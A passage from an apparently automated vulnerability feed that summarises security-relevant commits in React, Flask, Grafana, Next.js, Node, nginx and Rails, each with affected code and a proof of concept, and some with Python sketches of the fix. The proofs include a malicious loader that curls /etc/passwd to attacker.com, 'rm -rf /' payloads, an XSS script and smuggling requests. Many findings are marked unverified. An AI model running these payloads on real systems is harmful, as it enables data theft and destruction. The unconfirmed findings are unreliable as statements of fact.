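    # Brute-force a second field name mapping to the same truncated name.
    # At 4 hex chars this takes ~2^16 hashes. At the vulnerable 10 chars
    # (40 bits), a targeted second preimage needs ~2^40, but a collision
    # between two attacker-chosen names needs only ~2^20 (birthday bound).
    target = secret_name(ds_uid, target_key, hexlen)
    i = 0
    while True:
        candidate = f"field_{i}"
        if candidate != target_key and secret_name(ds_uid, candidate, hexlen) == target:
            return candidate
        i += 1

colliding = find_colliding_field("abc123", "password", hexlen=4)
```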

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 19, 2026, 04:37 PM — facebook/react

Commit: f247eba

Author: Tim Neutkens

The original code used JSON.parse with a reviver function that could potentially allow __proto__ property manipulation during RSC payload deserialization. The patch explicitly deletes __proto__ keys during the walking phase and moves away from the reviver approach to prevent prototype pollution attacks.

🔍 View Affected Code & PoC

Affected Code

return JSON.parse(json, response._fromJSON);
// where _fromJSON reviver processes all key-value pairs including __proto__

Proof of Concept

Send RSC payload with malicious JSON: {"__proto__": {"polluted": true, "isAdmin": true}} - this could pollute Object.prototype during the reviver processing before parseModelString filters are applied, potentially affecting application logic that checks object properties.
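Python has no prototype chain, so the pollution itself cannot be reproduced here, but the patch's walk-phase filtering translates directly: drop dangerous keys while recursively walking the parsed payload. A sketch (the extra banned keys are a defensive addition of mine, not part of the patch):

```python
import json

BANNED_KEYS = {"__proto__", "constructor", "prototype"}

def strip_proto(value):
    # Recursively drop dangerous keys from parsed JSON, mirroring the
    # walk-phase deletion the patch performs instead of relying on a
    # JSON.parse reviver.
    if isinstance(value, dict):
        return {k: strip_proto(v) for k, v in value.items() if k not in BANNED_KEYS}
    if isinstance(value, list):
        return [strip_proto(v) for v in value]
    return value

payload = '{"__proto__": {"polluted": true}, "data": [1, {"__proto__": 1}]}'
clean = strip_proto(json.loads(payload))
```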

⚠️ MEDIUM UNVERIFIED HTTP Response Splitting / Cache Poisoning

Feb 19, 2026, 03:02 AM — pallets/flask

Commit: c17f379

Author: David Lord

The session was not properly marked as accessed when only reading session metadata (keys, length checks), allowing responses to be cached without the Vary: Cookie header. This could lead to cache poisoning where one user's cached response is served to another user, potentially exposing session-dependent data.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

def get(self, key: str, default: t.Any = None) -> t.Any:
    self.accessed = True
    return super().get(key, default)
Proof of Concept

1. User A visits `/check` endpoint that does `if 'admin' in session:` (metadata access only)
2. Response cached without Vary: Cookie header since session.accessed stays False
3. User B (different session) visits same endpoint, gets User A's cached response
4. User B sees content based on User A's session state instead of their own session
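The intent of the fix — count metadata reads as access, then vary the cache key on the cookie whenever the session was touched — can be sketched without Flask (these are illustrative classes, not Flask's actual ones):

```python
class TrackedSession(dict):
    """Dict that records *any* read, including the metadata operations
    ('in', len()) that the vulnerable code missed."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.accessed = False

    def __getitem__(self, key):
        self.accessed = True
        return super().__getitem__(key)

    def __contains__(self, key):   # `'admin' in session`
        self.accessed = True
        return super().__contains__(key)

    def __len__(self):             # `len(session)`
        self.accessed = True
        return super().__len__()

def response_headers(session) -> dict:
    # Emit Vary: Cookie whenever the session influenced the response,
    # so shared caches never serve one user's page to another.
    return {"Vary": "Cookie"} if session.accessed else {}

s = TrackedSession(user="alice")
_ = "admin" in s                   # metadata-only access
headers = response_headers(s)      # must include Vary: Cookie
```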

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 03:35 AM — pallets/flask

Commit: 089cb86

Author: David Lord

The session was not being marked as accessed when only checking keys/metadata, allowing caching proxies to cache pages for different users. This could lead to session data being served to wrong users through shared caches. The patch fixes this by tracking session access at the request context level.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

Proof of Concept

1. User A logs in and visits /profile (session contains user data)
2. Caching proxy caches the response without Vary: Cookie header
3. User B visits /profile and gets User A's cached profile data
4. This occurs because operations like 'username' in session or len(session) didn't set accessed=True, so no Vary header was added

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 05:56 AM — pallets/flask

Commit: daca74d

Author: David Lord

The session was not being marked as accessed when only reading operations like checking keys or length occurred, causing the 'Vary: Cookie' header to not be set. This could allow caching proxies to serve the same cached response to different users, potentially leaking session-dependent data between users.

🔍 View Affected Code & PoC

Affected Code

def session(self) -> SessionMixin:
    if self._session is None:
        self._session = si.make_null_session(self.app)
    return self._session

Proof of Concept

User A visits `/profile` which checks `if 'user_id' in session:` and returns personalized data. Caching proxy caches this response without Vary: Cookie header. User B visits same URL and receives User A's cached personal data because session wasn't marked as accessed during the `in` operation.

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 19, 2026, 12:58 PM — grafana/grafana

Commit: b0d812f

Author: Rafael Bortolon Paulovic

The code had a race condition vulnerability during database migrations where concurrent writes to legacy tables could occur during unified storage migrations in rolling upgrade scenarios. This could lead to data corruption or inconsistent state as multiple processes could simultaneously modify the same database tables without proper synchronization.

🔍 View Affected Code & PoC

Affected Code

Resources: []migrations.ResourceInfo{
	{GroupResource: folderGR, LockTable: "folder"},
	{GroupResource: dashboardGR, LockTable: "dashboard"},
}

Proof of Concept

During a rolling upgrade, start a unified storage migration for dashboards while simultaneously having another Grafana instance write to the dashboard table. The race condition occurs when: 1) Migration process reads dashboard data from legacy tables, 2) Another instance modifies the same dashboard record, 3) Migration process writes to unified storage based on stale data, resulting in data loss or corruption of the dashboard modifications made in step 2.

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 19, 2026, 10:06 AM — grafana/grafana

Commit: d2b5d7a

Author: Georges Chaudy

The code had a fallback authentication mechanism that would allow any request to bypass authorization checks when the primary authenticator failed. The fallback would accept requests with only namespace validation, effectively allowing unauthorized access to resources.

🔍 View Affected Code & PoC

Affected Code

newCtx, err = f.fallback(ctx)
if newCtx != nil {
    newCtx = resource.WithFallback(newCtx)
}
f.metrics.requestsTotal.WithLabelValues("true", fmt.Sprintf("%t", err == nil)).Inc()
return newCtx, err

Proof of Concept

Send a gRPC request to the unified storage service with malformed or missing authentication headers that would cause the primary authenticator to fail. The fallback authenticator would then activate, and any subsequent resource access request with a valid namespace (e.g., namespace: "some-valid-namespace") would be granted access regardless of actual user permissions, bypassing RBAC controls entirely.

⚠️ MEDIUM UNVERIFIED Access Control Bypass

Feb 18, 2026, 10:25 PM — grafana/grafana

Commit: 1bf8245

Author: Mihai Turdean

The scope resolver cache was not invalidated when datasources were deleted, causing stale name-to-UID mappings. When a datasource was deleted and a new one created with the same name, the cached entry would resolve to the deleted datasource's UID, leading to incorrect authorization decisions. The patch fixes this by invalidating the cache entry for the datasource name scope during deletion.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no cache invalidation in deletion handlers
hs.Live.HandleDatasourceDelete(c.GetOrgID(), ds.UID)
return response.Success("Data source deleted")

Proof of Concept

1. Create datasource 'test-ds' with UID 'uid-123' (cache stores test-ds -> uid-123)
2. Delete datasource 'test-ds' (cache still has stale test-ds -> uid-123)
3. Create new datasource 'test-ds' with UID 'uid-456'
4. Access control checks for 'test-ds' resolve to deleted UID 'uid-123' instead of current 'uid-456', potentially allowing unauthorized access or denying legitimate access
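The stale-mapping flow and the patched invalidation can be sketched with a toy cache (class and method names are illustrative, not Grafana's API):

```python
class ScopeResolverCache:
    """Name -> UID cache with explicit invalidation on delete,
    sketching the patched behavior."""

    def __init__(self):
        self._by_name = {}

    def resolve(self, name, lookup):
        # Cache-aside: fill on miss, then serve from cache.
        if name not in self._by_name:
            self._by_name[name] = lookup(name)
        return self._by_name[name]

    def invalidate(self, name):
        self._by_name.pop(name, None)

store = {"test-ds": "uid-123"}
cache = ScopeResolverCache()
first = cache.resolve("test-ds", store.get)   # "uid-123" now cached

store["test-ds"] = "uid-456"                  # delete + recreate same name
stale = cache.resolve("test-ds", store.get)   # pre-patch: still "uid-123"

cache.invalidate("test-ds")                   # the patched deletion path
fresh = cache.resolve("test-ds", store.get)   # resolves to "uid-456"
```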

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 18, 2026, 10:33 PM — grafana/grafana

Commit: ba0f62a

Author: beejeebus

The code exposed encrypted datasource secrets even when they were empty, potentially leaking secret metadata or encrypted empty values to unauthorized users. The patch fixes this by filtering out empty secrets before returning them in API responses.

🔍 View Affected Code & PoC

Affected Code

return q.converter.AsDataSource(ds)

Proof of Concept

GET /api/datasources/{uid} - An attacker with read access could retrieve a datasource configuration and see references to all configured secret fields (even empty ones) in the SecureJsonData map, potentially revealing what secret fields are configured and their encrypted empty values, which could aid in further attacks or reveal system configuration details.

⚠️ MEDIUM UNVERIFIED Denial of Service / Resource Exhaustion

Feb 18, 2026, 04:53 PM — vercel/next.js

Commit: c885d48

Author: Zack Tanner

The code had a missing size check for postponed request bodies in self-hosted setups, allowing attackers to send arbitrarily large payloads that would consume server memory and potentially crash the application. The patch ensures maxPostponedStateSize is consistently enforced across all code paths that buffer postponed bodies.

🔍 View Affected Code & PoC

Affected Code

const body: Array<Buffer> = []
for await (const chunk of req) {
  body.push(chunk)
}
const postponed = Buffer.concat(body).toString('utf8')

Proof of Concept

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
next-resume: 1
Content-Length: 1073741824

[1GB of 'A' characters]

This would cause the server to buffer the entire 1GB payload in memory without any size validation, leading to memory exhaustion and potential DoS.
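The missing enforcement amounts to capping the buffer as it fills rather than after. A sketch of the patched behavior, with the cap standing in for maxPostponedStateSize:

```python
def read_body_capped(chunks, max_size: int) -> bytes:
    # Buffer a streamed request body, failing fast the moment the
    # configured cap is exceeded, instead of concatenating an unbounded
    # amount of attacker-controlled data in memory.
    buf, total = [], 0
    for chunk in chunks:
        total += len(chunk)
        if total > max_size:
            raise ValueError("postponed state exceeds configured limit")
        buf.append(chunk)
    return b"".join(buf)

ok = read_body_capped([b"a" * 10, b"b" * 10], max_size=32)
```

Crucially, the check runs per chunk: a 1 GB Content-Length is rejected after the first chunk past the limit, not after 1 GB has been buffered.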

⚠️ MEDIUM CONFIRMED Information Disclosure

Feb 18, 2026, 11:55 AM — grafana/grafana

Commit: a6a74c5

Author: Matheus Macabu

The audit logging configuration was exposing sensitive data source request and response bodies by default. This could lead to credentials, API keys, and sensitive query data being logged in plaintext audit files accessible to system administrators.

🔍 View Affected Code & PoC

Affected Code

log_datasource_query_request_body = true
log_datasource_query_response_body = true

Proof of Concept

1. Configure a data source with API key in headers (e.g., Prometheus with `Authorization: Bearer secret-token`)
2. Execute query: `up{job="mysql"}`
3. Check audit logs - they would contain: `"request_body":{"headers":{"Authorization":"Bearer secret-token"}}` and full response data including potentially sensitive metrics values

🔥 HIGH CONFIRMED Authorization Bypass

Feb 17, 2026, 03:51 PM — grafana/grafana

Commit: 0c82488

Author: Gabriel MABILLE

The rolebindings API was accessible to all authenticated users without proper authorization checks. This allowed any user to potentially view, modify, or create role bindings, leading to privilege escalation. The patch restricts access to only access policy identities.

🔍 View Affected Code & PoC

Affected Code

if a.GetResource() == "rolebindings" {
    return resourceAuthorizer.Authorize(ctx, a)
}

Proof of Concept

A regular user could make API calls to the rolebindings endpoint (e.g., GET /api/iam/rolebindings or POST /api/iam/rolebindings) with their normal user credentials to access or modify role bindings they shouldn't have access to, potentially escalating their privileges by binding themselves to administrative roles.
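A minimal sketch of the patched gate, assuming the rule is "access policy identities only" as described; the names and return values are hypothetical, not Grafana's authorizer API:

```python
ALLOWED_IDENTITY_TYPES = {"access-policy"}  # hypothetical label for access policy identities

def authorize_rolebindings(identity_type: str) -> str:
    """Allow rolebindings operations only for access policy identities."""
    return "allow" if identity_type in ALLOWED_IDENTITY_TYPES else "deny"

assert authorize_rolebindings("access-policy") == "allow"
assert authorize_rolebindings("user") == "deny"  # regular users can no longer touch rolebindings
```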

⚠️ MEDIUM UNVERIFIED HTTP Request Smuggling / Content Length Mismatch

Jan 30, 2026, 01:06 PM — nginx/nginx

Commit: ec714d5

Author: Sergey Kandaurov

In unbuffered mode, nginx could send SCGI backends a Content-Length header that did not match the actual request body size. The resulting desynchronization between nginx and the backend can enable HTTP request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

body = r->upstream->request_bufs;
while (body) {
    content_length_n += ngx_buf_size(body->buf);
    body = body->next;
}

Proof of Concept

Send a chunked POST request to nginx with SCGI backend in unbuffered mode:
```
POST /scgi-endpoint HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 100

5
hello
0

```
The recalculated body size (5 bytes) differs from original Content-Length (100 bytes), causing the SCGI backend to expect more data than nginx sends, leading to request desynchronization.
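The desynchronization is plain arithmetic. A sketch, assuming the chunked body from the request above decodes to the 5-byte "hello":

```python
def recalculated_body_size(chunks):
    # Mirrors the nginx loop: sum the sizes of the buffered body parts.
    return sum(len(c) for c in chunks)

declared = 100                                # Content-Length the client sent
actual = recalculated_body_size([b"hello"])   # the chunked body decodes to 5 bytes

assert actual == 5
assert declared - actual == 95  # the SCGI backend waits for 95 bytes that never arrive
```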

🔥 HIGH CONFIRMED Code Injection

Feb 16, 2026, 02:59 PM — nodejs/node

Commit: 4d867af

Author: Shelley Vohr

The build configuration script (Python) used eval() to parse configuration data, allowing arbitrary Python code execution if an attacker can control the node_builtin_shareable_builtins configuration value. The patch replaces eval() with json.loads() so the value is parsed strictly as JSON.

🔍 View Affected Code & PoC

Affected Code

eval(config['node_builtin_shareable_builtins'])

Proof of Concept

An attacker could set node_builtin_shareable_builtins to '__import__("os").system("rm -rf /")' which would execute arbitrary shell commands when eval() processes it during the build configuration generation.
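The unsafe/safe contrast is easy to demonstrate in Python itself; a harmless `os.getcwd()` payload stands in for a destructive command:

```python
import json

untrusted = '__import__("os").getcwd()'  # attacker-controlled config value

# Unsafe: eval() executes the payload as Python code.
result = eval(untrusted)  # runs os.getcwd(), i.e. arbitrary code execution
assert isinstance(result, str)

# Safe: json.loads() accepts only JSON literals and rejects code outright.
try:
    json.loads(untrusted)
    raise AssertionError("unreachable")
except json.JSONDecodeError:
    pass  # the payload never executes
```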

⚠️ MEDIUM CONFIRMED Authorization Bypass

Feb 16, 2026, 09:59 AM — grafana/grafana

Commit: bcc238c

Author: Misi

The endpoint allowed any authenticated user to access team member information without proper authorization checks. The patch adds a permission check requiring 'GetPermissions' verb on the Team resource before returning member data.

🔍 View Affected Code & PoC

Affected Code

// No authorization check before returning team members
result, err := s.client.Search(ctx, searchRequest)
if err != nil {
    responder.Error(err)
    return
}

Proof of Concept

An authenticated user without team permissions could call GET /api/teams/{team-id}/members to retrieve sensitive member information for any team they shouldn't have access to, potentially exposing user associations and team structure across the organization.

⚠️ MEDIUM UNVERIFIED Resource Deletion Bypass

Feb 16, 2026, 07:36 AM — grafana/grafana

Commit: 3f65188

Author: Daniele Stefano Ferru

The code allowed updating Repository resources to remove all finalizers, which would cause immediate deletion without proper cleanup when the resource is later deleted. This bypasses the intended cleanup workflow and could lead to orphaned resources or incomplete cleanup operations.

🔍 View Affected Code & PoC

Affected Code

if len(r.Finalizers) == 0 && a.GetOperation() == admission.Create {
    r.Finalizers = []string{
        RemoveOrphanResourcesFinalizer,
        CleanFinalizer,
    }
}

Proof of Concept

1. Create a Repository resource (finalizers are added automatically)
2. Update the Repository with an empty finalizers array: `kubectl patch repository myrepo --type='merge' -p='{"metadata":{"finalizers":[]}}'`
3. Delete the Repository: `kubectl delete repository myrepo`
4. The resource is immediately deleted without cleanup, bypassing the controller's cleanup logic and potentially leaving orphaned resources
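One way to close the gap is to re-apply required finalizers on update as well as create; a sketch with hypothetical finalizer names (the actual patch may instead reject the update):

```python
REQUIRED_FINALIZERS = [
    "cleanup.example/remove-orphan-resources",  # hypothetical names
    "cleanup.example/clean",
]

def admit_update(finalizers):
    """Restore any required finalizer that an update tried to strip."""
    merged = list(finalizers)
    for f in REQUIRED_FINALIZERS:
        if f not in merged:
            merged.append(f)
    return merged

# The kubectl patch from step 2 sends an empty list; the admission hook restores both.
assert admit_update([]) == REQUIRED_FINALIZERS
```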

⚠️ MEDIUM UNVERIFIED Authorization Bypass

Feb 16, 2026, 07:30 AM — grafana/grafana

Commit: 45f14bc

Author: Gonzalo Trigueros Manzanas

The files API endpoints were not enforcing quota limits, allowing authenticated users to bypass resource quotas and create unlimited files/dashboards. This could lead to resource exhaustion and denial of service. The patch adds quota checks before allowing POST/PUT operations on files.

🔍 View Affected Code & PoC

Affected Code

func (c *filesConnector) handleRequest(ctx context.Context, name string, r *http.Request, info rest.ConnectRequest) (http.Handler, error) {
	// Missing quota enforcement for write operations
	obj, err := c.handleMethodRequest(ctx, r, opts, isDir, dualReadWriter)
}

Proof of Concept

POST /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/test-repo/files/dashboard1.json with valid auth token and dashboard JSON payload. Repeat requests beyond the configured quota limit (e.g., if quota is 10 resources, make 15+ POST requests creating new files). Before the patch, all requests would succeed despite exceeding quota, potentially exhausting disk space or overwhelming the system.
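The added gate reduces to a count-against-limit check before the write; a sketch with a hypothetical limit and error type, not Grafana's quota service API:

```python
QUOTA_LIMIT = 10  # hypothetical configured quota

def check_quota(current_count, limit=QUOTA_LIMIT):
    """Reject the write once the caller has reached the quota."""
    if current_count >= limit:
        raise PermissionError("quota exceeded")

check_quota(5)        # request 6 of 10: allowed
try:
    check_quota(15)   # request 16: rejected before any file is written
    raise AssertionError("unreachable")
except PermissionError:
    pass
```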

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 13, 2026, 10:54 PM — rails/rails

Commit: 1a4305d

Author: Joshua Huber

The Deduplicable module incorrectly treated virtual (generated) columns and regular columns as identical when they had the same name and type, causing regular columns to be silently excluded from INSERT/UPDATE operations. This resulted in NULL values being stored instead of the intended data, leading to silent data corruption.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'name'
2. Create another table with a regular column named 'name' of same type
3. Access virtual column first to register it in deduplication cache
4. Attempt INSERT on regular table: MyModel.create!(name: 'test_data')
5. The 'name' field will be NULL in database instead of 'test_data' due to column deduplication treating regular column as virtual
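The bug reduces to a deduplication registry whose key omits the virtual flag; a Python sketch, not Rails source:

```python
from collections import namedtuple

Column = namedtuple("Column", "name type virtual")
registry = {}

def deduplicate(col):
    key = (col.name, col.type)  # buggy: the key ignores col.virtual
    return registry.setdefault(key, col)

virtual_col = deduplicate(Column("name", "varchar", True))   # registered first
regular_col = deduplicate(Column("name", "varchar", False))  # silently aliased

# The regular column now reports virtual=True, so it would be excluded
# from generated INSERT/UPDATE statements and its data stored as NULL.
assert regular_col is virtual_col
assert regular_col.virtual
# The fix is equivalent to widening the key: (col.name, col.type, col.virtual)
```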

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 14, 2026, 08:50 AM — rails/rails

Commit: 97cda8c

Author: Jean Boussier

The vulnerability allows silent data corruption where regular columns can be incorrectly deduplicated with virtual columns, causing INSERT and UPDATE statements to exclude legitimate columns and store NULL values instead of the intended data. This occurs when the deduplication registry encounters a virtual column first, then treats a regular column with the same name and type as identical.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'status'
2. Access the virtual column to register it in deduplication cache
3. Create another table with a regular column named 'status' 
4. Attempt to insert data: User.create!(status: 'active')
5. The status field will be NULL in database instead of 'active' because the regular column was deduplicated to the virtual column and excluded from the INSERT statement

💣 CRITICAL UNVERIFIED Code Injection

Feb 13, 2026, 06:45 PM — vercel/next.js

Commit: 740d55c

Author: Tobias Koppers

The feature allows arbitrary webpack loader execution through import attributes without proper validation or sandboxing. An attacker can specify malicious loader code that gets executed during the build process, potentially leading to remote code execution on the build server.

🔍 View Affected Code & PoC

Affected Code

import value from '../data.js' with { turbopackLoader: 'malicious-loader', turbopackLoaderOptions: '{"cmd":"rm -rf /"}' }

Proof of Concept

Create a malicious loader at node_modules/malicious-loader/index.js:
```js
module.exports = function(source) {
  const { exec } = require('child_process');
  exec('curl -X POST -d "$(cat /etc/passwd)" http://attacker.com/exfil');
  return source;
}
```
Then use: `import data from './file.txt' with { turbopackLoader: 'malicious-loader' }` to execute arbitrary commands during build time.

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 13, 2026, 06:25 PM — grafana/grafana

Commit: 74d146a

Author: Mihai Turdean

The MT IAM API server was using a no-op storage backend for RoleBindings, which silently dropped all write operations and returned empty results for reads. Additionally, the authorizer denied all access to rolebindings. This created an authorization bypass where RBAC role bindings were completely non-functional, potentially allowing unauthorized access or preventing proper access controls from being enforced.

🔍 View Affected Code & PoC

Affected Code

roleBindingsStorage: noopstorage.ProvideStorageBackend(), // TODO: add a proper storage backend
...
return authorizer.DecisionDeny, "access denied", nil

Proof of Concept

POST /apis/iam.grafana.app/v0alpha1/rolebindings with body: {"apiVersion":"iam.grafana.app/v0alpha1","kind":"RoleBinding","metadata":{"name":"admin-binding"},"subjects":[{"kind":"User","name":"attacker"}],"roleRef":{"kind":"Role","name":"admin"}} - This request would be silently dropped by noopstorage, never creating the intended role binding, while appearing to succeed to the caller.
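The noop-backend failure mode, writes that report success but persist nothing, can be sketched as:

```python
class NoopStorage:
    """Sketch of a no-op backend: every operation 'succeeds' without persisting."""
    def create(self, obj):
        return {"status": "created", "name": obj["metadata"]["name"]}  # looks successful
    def get(self, name):
        return None  # nothing was ever stored

storage = NoopStorage()
resp = storage.create({"metadata": {"name": "admin-binding"}})
assert resp["status"] == "created"            # the caller sees success...
assert storage.get("admin-binding") is None   # ...but the role binding does not exist
```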

⚠️ MEDIUM UNVERIFIED Use-After-Free / Socket Corruption

Feb 6, 2026, 04:29 PM — nodejs/node

Commit: 37ff1ea

Author: Martin Slota

A race condition in HTTP keep-alive socket reuse allowed responseKeepAlive() to be called twice, corrupting socket state and causing the agent to hand an already-assigned socket to multiple requests. This could cause requests to hang, timeout, or potentially leak data between requests sharing the same corrupted socket.

🔍 View Affected Code & PoC

Affected Code

if (req.shouldKeepAlive && req._ended)
  responseKeepAlive(req);

Proof of Concept

const http = require('http');
const agent = new http.Agent({ keepAlive: true, maxSockets: 1 });

// Send multiple POST requests with Expect: 100-continue header
// The server responds quickly while client delays req.end() slightly
// This triggers the race where responseOnEnd() and requestOnFinish() 
// both call responseKeepAlive(), corrupting the socket and causing
// subsequent requests to hang or timeout due to stripped listeners

for (let i = 0; i < 10; i++) {
  const req = http.request({
    method: 'POST',
    agent,
    headers: { 'Expect': '100-continue' }
  });
  setTimeout(() => req.end(), 0); // Delay to hit race window
}
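The generic defense against this class of bug is an idempotence guard so the racing second call becomes a no-op; a sketch, not Node's actual fix:

```python
class PooledSocket:
    """Guard a pooled resource so a duplicate release cannot corrupt its state."""
    def __init__(self):
        self.released = False
        self.release_count = 0

    def release(self):
        if self.released:
            return  # second caller (the racing code path) is ignored
        self.released = True
        self.release_count += 1  # the socket re-enters the free pool exactly once

s = PooledSocket()
s.release()
s.release()  # e.g. responseOnEnd() and requestOnFinish() both firing
assert s.release_count == 1
```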

💡 LOW UNVERIFIED Race Condition (TOCTOU)

Feb 13, 2026, 04:30 PM — nodejs/node

Commit: b92c9b5

Author: giulioAZ

A Time-of-Check Time-of-Use race condition in worker thread process.cwd() caching allowed workers to cache stale directory values. The counter was incremented before the directory change completed, creating a race window where workers could read the old directory but cache it with the new counter value.

🔍 View Affected Code & PoC

Affected Code

process.chdir = function(path) {
  AtomicsAdd(cwdCounter, 0, 1);
  originalChdir(path);
};

Proof of Concept

const { Worker } = require('worker_threads');
const worker = new Worker(`
  setInterval(() => {
    const cwd = process.cwd();
    console.log('Worker sees:', cwd);
  }, 1);
`, { eval: true });

// Rapidly change directories
setInterval(() => {
  process.chdir('..');
  process.chdir('./some-dir');
}, 10);

// Workers will intermittently report incorrect directory paths due to caching stale values with updated counter
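The race window can be replayed deterministically by interleaving the three steps by hand; this is a simulation of the ordering bug, not Node internals:

```python
state = {"cwd": "/old", "counter": 0}
cache = {}

def chdir_buggy(path, observe_between):
    state["counter"] += 1   # step 1: counter bumped BEFORE the change (the bug)
    observe_between()       # a worker samples inside the race window
    state["cwd"] = path     # step 2: the directory change completes

def worker_sample():
    cache["cwd"] = state["cwd"]          # reads the old directory...
    cache["counter"] = state["counter"]  # ...but tags it with the new counter

chdir_buggy("/new", worker_sample)
# The stale "/old" is cached with counter 1, so it looks up to date forever.
assert cache == {"cwd": "/old", "counter": 1}
```

Incrementing the counter only after the directory change completes closes the window: a stale read then carries a stale counter and gets refreshed on the next check.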

🔥 HIGH CONFIRMED Privilege Escalation

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: e97fa5f

Author: Mariell Hoversholm

The vulnerability allows attackers to bypass time range restrictions on public dashboards when time selection is disabled. By manipulating request time parameters, attackers can access annotations outside the intended dashboard time range, potentially exposing sensitive data from unauthorized time periods.

🔍 View Affected Code & PoC

Affected Code

annoQuery := &annotations.ItemQuery{
	From:         reqDTO.From,
	To:           reqDTO.To,
	OrgID:        dash.OrgID,
	DashboardID:  dash.ID,

Proof of Concept

POST /api/public/dashboards/{uid}/annotations with body: {"from": 0, "to": 9999999999999} - This would bypass dashboard time restrictions and retrieve all annotations across the entire time range, even when time selection is disabled and should be restricted to the dashboard's configured time window.
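The server-side fix shape is to clamp the requested range to the dashboard's configured window before querying; a sketch with made-up Unix timestamps:

```python
def clamp_time_range(req_from, req_to, dash_from, dash_to):
    """Never serve annotations outside the dashboard window when time selection is disabled."""
    return max(req_from, dash_from), min(req_to, dash_to)

# Attacker asks for everything; the dashboard is pinned to a one-hour window.
assert clamp_time_range(0, 9999999999999, 1_700_000_000, 1_700_003_600) == (
    1_700_000_000,
    1_700_003_600,
)
```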

⚠️ MEDIUM CONFIRMED XSS

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: 8dfa644

Author: Mariell Hoversholm

The code was vulnerable to Cross-Site Scripting (XSS) by directly rendering user-controlled data via dangerouslySetInnerHTML without sanitization. Malicious trace data could inject JavaScript that would execute in users' browsers. The patch fixes this by sanitizing HTML content with DOMPurify before rendering.

🔍 View Affected Code & PoC

Affected Code

const jsonTable = <div className={styles.jsonTable} dangerouslySetInnerHTML={markup} />;

where markup could contain:
__html: `<span style="white-space: pre-wrap;">${row.value}</span>`

Proof of Concept

A malicious trace with a KeyValuePair containing: {"key": "malicious", "value": "</span><script>alert('XSS');</script><span>", "type": "text"} would result in script execution when viewing the trace details in Grafana's TraceView component.
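The underlying rule is to neutralize markup before interpolating untrusted values. Grafana's patch sanitizes with DOMPurify in JavaScript; Python's html.escape is a stand-in for the same idea:

```python
import html

row_value = "</span><script>alert('XSS');</script><span>"

# Escape the untrusted value before it is interpolated into markup.
markup = f'<span style="white-space: pre-wrap;">{html.escape(row_value)}</span>'

assert "<script>" not in markup    # the payload can no longer execute
assert "&lt;script&gt;" in markup  # it renders as inert text instead
```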

⚠️ MEDIUM CONFIRMED Header Injection

Feb 11, 2026, 12:36 AM — grafana/grafana

Commit: f073f64

Author: Jocelyn Collado-Kuri

The code forwards arbitrary HTTP headers from incoming requests to outgoing gRPC calls without proper validation or sanitization. An attacker can inject malicious headers that could be used to bypass security controls, manipulate downstream services, or perform request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

for key, value := range req.Headers {
    ctx = metadata.AppendToOutgoingContext(ctx, key, url.PathEscape(value))
}

Proof of Concept

Send a streaming request with malicious headers like 'Authorization: Bearer stolen-token' or 'X-Forwarded-For: 127.0.0.1' in the Headers map of backend.RunStreamRequest. These headers would be forwarded to the Tempo backend, potentially allowing privilege escalation or IP spoofing attacks against the downstream service.

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 5, 2026, 07:26 PM — vercel/next.js

Commit: 6aeef8e

Author: nextjs-bot

The code was directly reading the `$$typeof` property from potentially untrusted objects, so an attacker able to pollute Object.prototype could inject a forged `$$typeof` and have arbitrary objects treated as React elements. The patch introduces a `readReactElementTypeof` function that uses `hasOwnProperty.call()` to check for the property on the object itself rather than the prototype chain.

🔍 View Affected Code & PoC

Affected Code

if (value.$$typeof === REACT_ELEMENT_TYPE) {
  var typeName = getComponentNameFromType(value.type) || "\u2026",
    key = value.key;
  value = value.props;

Proof of Concept

Object.prototype.$$typeof = Symbol.for('react.element');
const maliciousObj = { type: 'script', props: { dangerouslySetInnerHTML: { __html: 'alert(1)' } } };
// This object would bypass React element validation because the polluted prototype supplies $$typeof
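A Python analogy of the own-property fix, with the class playing the role of the prototype chain (an analogy only; the real check is JavaScript's hasOwnProperty.call()):

```python
class Base:
    pass

Base.typeof = "react.element"  # 'polluted' attribute shared via the class

obj = Base()

# Chain lookup is fooled: the attribute is inherited, not the object's own.
assert getattr(obj, "typeof", None) == "react.element"

# Own-property check is safe: the object itself defines nothing.
assert "typeof" not in vars(obj)
```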

⚠️ MEDIUM UNVERIFIED Integer Division by Zero / Panic-based DoS

Feb 6, 2026, 08:03 PM — vercel/next.js

Commit: 6dfcffe

Author: Niklas Mischkulnig

The code performed integer division without checking for division by zero, which could cause a panic and crash the application. The patch replaces direct division with checked_div() to handle zero divisors safely.

🔍 View Affected Code & PoC

Affected Code

if max_chunk_count_per_group != 0 {
    chunks_to_merge_size / max_chunk_count_per_group
} else {
    unreachable!();
}

Proof of Concept

Set max_chunk_count_per_group to 0 through configuration or input parameters. When make_production_chunks() is called with this configuration, the division chunks_to_merge_size / max_chunk_count_per_group will cause a panic, crashing the Turbopack bundler and causing a denial of service.
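Rust's checked_div maps a zero divisor to None instead of panicking; a minimal Python mirror of the patched behavior:

```python
def checked_div(a, b):
    """Return a // b, or None when b == 0 (mirrors Rust's checked_div)."""
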